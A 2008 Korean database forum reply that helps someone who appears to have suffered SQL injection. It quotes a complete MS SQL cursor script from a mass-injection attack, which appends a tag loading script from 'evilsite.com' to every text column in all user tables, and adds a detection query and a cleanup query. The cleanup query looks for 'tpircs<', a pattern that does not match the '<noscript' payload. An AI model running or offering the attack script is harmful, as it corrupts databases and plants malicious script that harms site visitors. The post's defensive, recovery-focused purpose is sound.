데이터베이스를 사랑하는 사람들의 모임 데이터베이스 사랑넷

음 공격당한게 아니신지여...
(보통 웹에서 URL에 강제적으로 값을 넣어서 공격합니다)
인젝션 공격에대해 내부적으로 막아야겟지여

/*
* 제목 : injection 공격 쿼리
* 증상 : 사용자 테이블의 필드에 <noscript src=http://evilsite.com/1.js>삽입

DECLARE @T varchar(255), @C varchar(255);
DECLARE Table_Cursor CURSOR FOR
SELECT a.name, b.name
FROM sysobjects a, syscolumns b
WHERE a.id = b.id AND a.xtype = 'u' AND
(b.xtype = 99 OR
b.xtype = 35 OR
b.xtype = 231 OR
b.xtype = 167);
OPEN Table_Cursor;
FETCH NEXT FROM Table_Cursor INTO @T, @C;
WHILE (@@FETCH_STATUS = 0) BEGIN
EXEC(
    'update [' + @T + '] set [' + @C + '] =
        rtrim(convert(varchar,[' + @C + ']))+
        ''<noscript src=http://evilsite.com/1.js>'''
);
FETCH NEXT FROM Table_Cursor INTO @T, @C;
END;
CLOSE Table_Cursor;
DEALLOCATE Table_Cursor;

* Script 삽입 공격을 당했는지 확인하는 쿼리

exec ('select ['+@C+'] from ['+@T+'] where ['+@C+'] like ''%<noscript%''');
-- print 'select ['+@C+'] from ['+@T+'] where ['+@C+'] like ''%<noscript%'''

FETCH NEXT FROM Table_Cursor INTO @T, @C;
END;
CLOSE Table_Cursor;
DEALLOCATE Table_Cursor;

* 위의 공격을 당했을 때 복원하는 쿼리 (100% 다 되는 것은 아님 - 별도 확인 필요)

* 해킹 시 길이가 긴 경우에는 짤리고 들어가는 현상이 발생함 - 이 경우에는 복원을 해도 원상복구가 안됨

* 백업 받은 것을 복원하는 수 밖에는 없음

DECLARE @T varchar(255), @C varchar(255);
DECLARE Table_Cursor CURSOR FOR
SELECT a.name, b.name
FROM sysobjects a, syscolumns b
WHERE a.id = b.id AND a.xtype = 'u' AND
(b.xtype = 99 OR
b.xtype = 35 OR
b.xtype = 231 OR
b.xtype = 167);
OPEN Table_Cursor;
FETCH NEXT FROM Table_Cursor INTO @T, @C;
WHILE (@@FETCH_STATUS = 0) BEGIN
EXEC(
    'update ['+@T+'] set ['+@C+'] = left(
            convert(varchar(8000), ['+@C+']),
            len(convert(varchar(8000), ['+@C+'])) - 6 -
            patindex(''%tpircs<%'',
                      reverse(convert(varchar(8000), ['+@C+'])))
            )
      where ['+@C+'] like ''%<noscript%'''
      );
FETCH NEXT FROM Table_Cursor INTO @T, @C;
END;
CLOSE Table_Cursor;
DEALLOCATE Table_Cursor;
*/

[출처] [MS SQL] Injection 공격 유형(1) 및 해결방안

임진표(운가라)님이 2008-07-29 08:51에 작성한 댓글입니다.
이 댓글은 2008-07-29 08:55에 마지막으로 수정되었습니다.